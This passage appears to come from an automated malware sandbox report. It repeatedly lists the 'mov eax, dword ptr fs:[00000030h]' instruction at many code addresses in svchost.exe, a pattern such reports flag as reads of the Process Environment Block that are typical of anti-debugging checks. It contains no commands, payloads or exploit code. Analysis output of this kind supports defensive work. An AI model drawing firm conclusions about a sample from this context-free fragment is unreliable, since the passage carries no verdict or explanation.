            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03027330 mov eax, dword ptr fs:[00000030h]1_2_03027330
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]1_2_030B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302D34C mov eax, dword ptr fs:[00000030h]1_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302D34C mov eax, dword ptr fs:[00000030h]1_2_0302D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03105341 mov eax, dword ptr fs:[00000030h]1_2_03105341
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029353 mov eax, dword ptr fs:[00000030h]1_2_03029353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029353 mov eax, dword ptr fs:[00000030h]1_2_03029353
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov ecx, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]1_2_030B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FA352 mov eax, dword ptr fs:[00000030h]1_2_030FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EF367 mov eax, dword ptr fs:[00000030h]1_2_030EF367
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D437C mov eax, dword ptr fs:[00000030h]1_2_030D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03037370 mov eax, dword ptr fs:[00000030h]1_2_03037370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03037370 mov eax, dword ptr fs:[00000030h]1_2_03037370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03037370 mov eax, dword ptr fs:[00000030h]1_2_03037370
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]1_2_0302E388
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]1_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]1_2_0305438F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0310539D mov eax, dword ptr fs:[00000030h]1_2_0310539D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308739A mov eax, dword ptr fs:[00000030h]1_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0308739A mov eax, dword ptr fs:[00000030h]1_2_0308739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]1_2_03028397
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030533A5 mov eax, dword ptr fs:[00000030h]1_2_030533A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030633A0 mov eax, dword ptr fs:[00000030h]1_2_030633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030633A0 mov eax, dword ptr fs:[00000030h]1_2_030633A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC3CD mov eax, dword ptr fs:[00000030h]1_2_030EC3CD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A3C0 mov eax, dword ptr fs:[00000030h]1_2_0303A3C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030383C0 mov eax, dword ptr fs:[00000030h]1_2_030383C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EB3D0 mov ecx, dword ptr fs:[00000030h]1_2_030EB3D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EF3E6 mov eax, dword ptr fs:[00000030h]1_2_030EF3E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031053FC mov eax, dword ptr fs:[00000030h]1_2_031053FC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030403E9 mov eax, dword ptr fs:[00000030h]1_2_030403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E3F0 mov eax, dword ptr fs:[00000030h]1_2_0304E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030663FF mov eax, dword ptr fs:[00000030h]1_2_030663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03067208 mov eax, dword ptr fs:[00000030h]1_2_03067208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03067208 mov eax, dword ptr fs:[00000030h]1_2_03067208
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03105227 mov eax, dword ptr fs:[00000030h]1_2_03105227
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302823B mov eax, dword ptr fs:[00000030h]1_2_0302823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029240 mov eax, dword ptr fs:[00000030h]1_2_03029240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029240 mov eax, dword ptr fs:[00000030h]1_2_03029240
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306724D mov eax, dword ptr fs:[00000030h]1_2_0306724D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A250 mov eax, dword ptr fs:[00000030h]1_2_0302A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EB256 mov eax, dword ptr fs:[00000030h]1_2_030EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EB256 mov eax, dword ptr fs:[00000030h]1_2_030EB256
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036259 mov eax, dword ptr fs:[00000030h]1_2_03036259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03034260 mov eax, dword ptr fs:[00000030h]1_2_03034260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FD26B mov eax, dword ptr fs:[00000030h]1_2_030FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030FD26B mov eax, dword ptr fs:[00000030h]1_2_030FD26B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302826B mov eax, dword ptr fs:[00000030h]1_2_0302826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03059274 mov eax, dword ptr fs:[00000030h]1_2_03059274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03071270 mov eax, dword ptr fs:[00000030h]1_2_03071270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03071270 mov eax, dword ptr fs:[00000030h]1_2_03071270
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E0274 mov eax, dword ptr fs:[00000030h]1_2_030E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306E284 mov eax, dword ptr fs:[00000030h]1_2_0306E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B0283 mov eax, dword ptr fs:[00000030h]1_2_030B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03105283 mov eax, dword ptr fs:[00000030h]1_2_03105283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306329E mov eax, dword ptr fs:[00000030h]1_2_0306329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306329E mov eax, dword ptr fs:[00000030h]1_2_0306329E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402A0 mov eax, dword ptr fs:[00000030h]1_2_030402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A0 mov eax, dword ptr fs:[00000030h]1_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A0 mov eax, dword ptr fs:[00000030h]1_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A0 mov eax, dword ptr fs:[00000030h]1_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030452A0 mov eax, dword ptr fs:[00000030h]1_2_030452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F92A6 mov eax, dword ptr fs:[00000030h]1_2_030F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F92A6 mov eax, dword ptr fs:[00000030h]1_2_030F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F92A6 mov eax, dword ptr fs:[00000030h]1_2_030F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F92A6 mov eax, dword ptr fs:[00000030h]1_2_030F92A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov ecx, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C62A0 mov eax, dword ptr fs:[00000030h]1_2_030C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C72A0 mov eax, dword ptr fs:[00000030h]1_2_030C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C72A0 mov eax, dword ptr fs:[00000030h]1_2_030C72A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B92BC mov eax, dword ptr fs:[00000030h]1_2_030B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B92BC mov eax, dword ptr fs:[00000030h]1_2_030B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B92BC mov ecx, dword ptr fs:[00000030h]1_2_030B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B92BC mov ecx, dword ptr fs:[00000030h]1_2_030B92BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303A2C3 mov eax, dword ptr fs:[00000030h]1_2_0303A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B2C0 mov eax, dword ptr fs:[00000030h]1_2_0305B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030392C5 mov eax, dword ptr fs:[00000030h]1_2_030392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030392C5 mov eax, dword ptr fs:[00000030h]1_2_030392C5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B2D3 mov eax, dword ptr fs:[00000030h]1_2_0302B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B2D3 mov eax, dword ptr fs:[00000030h]1_2_0302B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B2D3 mov eax, dword ptr fs:[00000030h]1_2_0302B2D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305F2D0 mov eax, dword ptr fs:[00000030h]1_2_0305F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305F2D0 mov eax, dword ptr fs:[00000030h]1_2_0305F2D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E12ED mov eax, dword ptr fs:[00000030h]1_2_030E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030402E1 mov eax, dword ptr fs:[00000030h]1_2_030402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031052E2 mov eax, dword ptr fs:[00000030h]1_2_031052E2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EF2F8 mov eax, dword ptr fs:[00000030h]1_2_030EF2F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030292FF mov eax, dword ptr fs:[00000030h]1_2_030292FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov ecx, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030DA118 mov eax, dword ptr fs:[00000030h]1_2_030DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F0115 mov eax, dword ptr fs:[00000030h]1_2_030F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03060124 mov eax, dword ptr fs:[00000030h]1_2_03060124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03031131 mov eax, dword ptr fs:[00000030h]1_2_03031131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03031131 mov eax, dword ptr fs:[00000030h]1_2_03031131
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B136 mov eax, dword ptr fs:[00000030h]1_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B136 mov eax, dword ptr fs:[00000030h]1_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B136 mov eax, dword ptr fs:[00000030h]1_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302B136 mov eax, dword ptr fs:[00000030h]1_2_0302B136
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03105152 mov eax, dword ptr fs:[00000030h]1_2_03105152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov ecx, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029148 mov eax, dword ptr fs:[00000030h]1_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029148 mov eax, dword ptr fs:[00000030h]1_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029148 mov eax, dword ptr fs:[00000030h]1_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029148 mov eax, dword ptr fs:[00000030h]1_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03037152 mov eax, dword ptr fs:[00000030h]1_2_03037152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h]1_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C9179 mov eax, dword ptr fs:[00000030h]1_2_030C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03070185 mov eax, dword ptr fs:[00000030h]1_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
